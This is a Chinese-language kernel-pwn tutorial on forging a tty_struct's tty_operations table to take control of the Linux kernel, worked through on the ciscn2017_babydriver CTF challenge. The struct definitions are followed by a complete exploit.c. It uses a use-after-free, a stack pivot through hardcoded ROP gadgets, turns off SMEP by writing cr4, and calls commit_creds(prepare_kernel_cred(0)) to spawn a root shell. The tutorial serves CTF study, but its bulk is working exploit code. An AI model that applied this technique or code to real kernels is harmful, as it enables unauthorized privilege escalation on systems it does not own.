linux kernel pwn学习之伪造tty_struct执行任意函数
Linux Kernel伪造tty_struct执行任意函数
当用户打开ptmx驱动时,会分配一个tty_struct结构,它的结构如下
- struct tty_struct {
- int magic;
- struct kref kref;
- struct device *dev;
- struct tty_driver *driver;
- const struct tty_operations *ops;
- int index;
- /* Protects ldisc changes: Lock tty not pty */
- struct ld_semaphore ldisc_sem;
- struct tty_ldisc *ldisc;
- struct mutex atomic_write_lock;
- struct mutex legacy_mutex;
- struct mutex throttle_mutex;
- struct rw_semaphore termios_rwsem;
- struct mutex winsize_mutex;
- spinlock_t ctrl_lock;
- spinlock_t flow_lock;
- /* Termios values are protected by the termios rwsem */
- struct ktermios termios, termios_locked;
- struct termiox *termiox; /* May be NULL for unsupported */
- char name[64];
- struct pid *pgrp; /* Protected by ctrl lock */
- struct pid *session;
- unsigned long flags;
- int count;
- struct winsize winsize; /* winsize_mutex */
- unsigned long stopped:1, /* flow_lock */
- flow_stopped:1,
- unused:BITS_PER_LONG - 2;
- int hw_stopped;
- unsigned long ctrl_status:8, /* ctrl_lock */
- packet:1,
- unused_ctrl:BITS_PER_LONG - 9;
- unsigned int receive_room; /* Bytes free for queue */
- int flow_change;
- struct tty_struct *link;
- struct fasync_struct *fasync;
- wait_queue_head_t write_wait;
- wait_queue_head_t read_wait;
- struct work_struct hangup_work;
- void *disc_data;
- void *driver_data;
- spinlock_t files_lock; /* protects tty_files list */
- struct list_head tty_files;
- #define N_TTY_BUF_SIZE 4096
- int closing;
- unsigned char *write_buf;
- int write_cnt;
- /* If the tty has a pending do_SAK, queue it here - akpm */
- struct work_struct SAK_work;
- struct tty_port *port;
- } __randomize_layout;
其中有一个const struct tty_operations *ops指针,它是一个tty_operations指针,而tty_operations结构体里是一些列对驱动操作的函数指针。
- struct tty_operations {
- struct tty_struct * (*lookup)(struct tty_driver *driver,
- struct file *filp, int idx);
- int (*install)(struct tty_driver *driver, struct tty_struct *tty);
- void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
- int (*open)(struct tty_struct * tty, struct file * filp);
- void (*close)(struct tty_struct * tty, struct file * filp);
- void (*shutdown)(struct tty_struct *tty);
- void (*cleanup)(struct tty_struct *tty);
- int (*write)(struct tty_struct * tty,
- const unsigned char *buf, int count);
- int (*put_char)(struct tty_struct *tty, unsigned char ch);
- void (*flush_chars)(struct tty_struct *tty);
- int (*write_room)(struct tty_struct *tty);
- int (*chars_in_buffer)(struct tty_struct *tty);
- int (*ioctl)(struct tty_struct *tty,
- unsigned int cmd, unsigned long arg);
- long (*compat_ioctl)(struct tty_struct *tty,
- unsigned int cmd, unsigned long arg);
- void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
- void (*throttle)(struct tty_struct * tty);
- void (*unthrottle)(struct tty_struct * tty);
- void (*stop)(struct tty_struct *tty);
- void (*start)(struct tty_struct *tty);
- void (*hangup)(struct tty_struct *tty);
- int (*break_ctl)(struct tty_struct *tty, int state);
- void (*flush_buffer)(struct tty_struct *tty);
- void (*set_ldisc)(struct tty_struct *tty);
- void (*wait_until_sent)(struct tty_struct *tty, int timeout);
- void (*send_xchar)(struct tty_struct *tty, char ch);
- int (*tiocmget)(struct tty_struct *tty);
- int (*tiocmset)(struct tty_struct *tty,
- unsigned int set, unsigned int clear);
- int (*resize)(struct tty_struct *tty, struct winsize *ws);
- int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
- int (*get_icount)(struct tty_struct *tty,
- struct serial_icounter_struct *icount);
- void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
- #ifdef CONFIG_CONSOLE_POLL
- int (*poll_init)(struct tty_driver *driver, int line, char *options);
- int (*poll_get_char)(struct tty_driver *driver, int line);
- void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
- #endif
- int (*proc_show)(struct seq_file *, void *);
- } __randomize_layout;
比如,我们对ptmx驱动进行write操作时,就会调用这个里面的write指针指向的函数。也就是,我们如果能伪造tty_operations结构体,将里面的指针指向我们需要执行的函数。然后将tty_struct结构体里的const struct tty_operations *ops指针指向我们伪造的tty_operations结构体,然后对驱动执行对应的操作,比如write,就能触发函数的执行。而tty_struct结构体,我们可以通过漏洞来控制,然后修改指针。这种思想,就如同是glibc下的house of orange,house of orange是伪造vtable表,而我们这里,同样是伪造函数表。为了加深理解,我们以ciscn2017_babydriver为例,之前,我们利用UAF修改了cred结构,这次,我们用同样的方法,修改tty_struct结构。
ciscn2017_babydriver
阅读对应版本的linux内核源码,我们发现,tty_struct结构体的大小为0x2E0。为了实现执行的目的,我们可以利用ROP,但是本题没有栈溢出,我们可以伪造tty_operations里面对应的函数的来将栈转移到我们可以控制的地方。为了清楚对应的函数被调用前的各个寄存器的值,以方便我们后续的分析,我们先将tty_operations[7]伪造为babydriver里的babyread函数的地址。查看结构体,tty_operations[7]也就是对驱动进行write操作时的处理函数的指针。我们现在把它伪造指向了babyread,然后利用gdb调试,对ptmx驱动执行write操作,在babyread函数前断点。
- for (int i=0;i<35;i++) {
- fake_tty_operations[i] = 0xffffffffc0000000 + i;
- }
- fake_tty_operations[7] = 0xffffffffc0000130; //babyread的函数地址
然后,执行exp,在babyread下断了下来,我们查看各个寄存器的值,发现rax正好指向我们的fake_tty_operations,
因此,我们只需要把fake_tty_operations[7]伪造成gadgets
- mov rsp,rax;
- ...........
- ret
这样,我们对驱动执行write操作时,就能够将栈转移到我们用户的fake_tty_operations空间里,我们在这里面再布置一个栈转移的gadgets,将栈最终转移到我们的rop数组里,执行rop。
完成这些以后,就是常规ROP操作了。我们最终的exploit.c程序
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
//tty_struct结构体的大小
#define TTY_STRUCT_SIZE 0x2E0
//mov cr4, rdi ; pop rbp ; ret
#define MOV_CR4_RDI 0xffffffff81004d80
//pop rdi ; ret
#define POP_RDI 0xffffffff810d238d
//swapgs ; pop rbp ; ret
#define SWAPGS 0xffffffff81063694
//iretq
#define IRETQ 0xFFFFFFFF8181A797
//commit_creds函数
#define COMMIT_CREDS 0xffffffff810a1420
// prepare_kernel_cred
#define PREPARE_KERNEL_CRED 0xffffffff810a1810
//mov rsp, rax;dec ebx;ret,做栈迁移用
#define MOV_RSP_RAX 0xFFFFFFFF8181BFC5
#define POP_RAX 0xffffffff8100ce6e
void getRoot() {
//函数指针
void *(*pkc)(int) = (void *(*)(int))PREPARE_KERNEL_CRED;
void (*cc)(void *) = (void (*)(void *))COMMIT_CREDS;
//commit_creds(prepare_kernel_cred(0))
(*cc)((*pkc)(0));
}
void getShell() {
if (getuid() == 0) {
printf("[+]Rooted!!\n");
system("/bin/sh");
} else {
printf("[+]Root Fail!!\n");
}
}
size_t user_cs,user_ss,user_flags,user_sp;
/*保存用户态的寄存器到变量里*/
void saveUserState() {
__asm__("mov %cs,user_cs;"
"mov %ss,user_ss;"
"mov %rsp,user_sp;"
"pushf;"
"pop user_flags;"
);
puts("user states have been saved!!");
}
int main() {
//保存用户态寄存器
saveUserState();
int fd1 = open("/dev/babydev",O_RDWR);
int fd2 = open("/dev/babydev",O_RDWR);
if (fd1 < 0 || fd2 < 0) {
printf("open file error!!\n");
exit(-1);
}
//申请一个tty_struct大小的堆
ioctl(fd1,0x10001,TTY_STRUCT_SIZE);
//释放这个堆
close(fd1);
size_t rop[0x100];
int i = 0;
rop[i++] = POP_RDI;
rop[i++] = 0x6f0;
rop[i++] = MOV_CR4_RDI;
rop[i++] = 0;
rop[i++] = (size_t)getRoot;
rop[i++] = SWAPGS;
rop[i++] = 0;
rop[i++] = IRETQ;
rop[i++] = (size_t)getShell;
rop[i++] = user_cs;
rop[i++] = user_flags;
rop[i++] = user_sp;
rop[i++] = user_ss;
size_t fake_tty_operations[35];
/*for (int i=0;i<35;i++) {
fake_tty_operations[i] = 0xffffffffc0000000 + i;
}*/
//这个位置是write函数的指针,经过调试,我们发现当调用这个函数时,rax正好是fake_tty_operation的地址,于是,我们把栈转移到
//fake_tty_operations里
fake_tty_operations[7] = MOV_RSP_RAX;
//栈转移到fake_tty_operations里后,我们继续做一次转移,把转转移到我们的rop数组里,执行ROP
fake_tty_operations[0] = POP_RAX;
fake_tty_operations[1] = (size_t)rop;
fake_tty_operations[2] = MOV_RSP_RAX;
size_t fake_tty_struct[4];
//这个操作会申请tty_struct的空间,也就是会申请到我们之前释放的那个堆里,我们可以用fd2来对它操作
int fd_tty = open("/dev/ptmx", O_RDWR);
//我们先把原始的tty_struct前面的数据读出来,存储
read(fd2,fake_tty_struct,4*8);
//修改const struct tty_operations *ops;指针,指向我们伪造的tty_operations
fake_tty_struct[3] = (size_t)fake_tty_operations;
//把篡改过的tty_struct写回去
write(fd2,fake_tty_struct,4*8);
char buf[0x10];
write(fd_tty,buf,0x10);
return 0;
}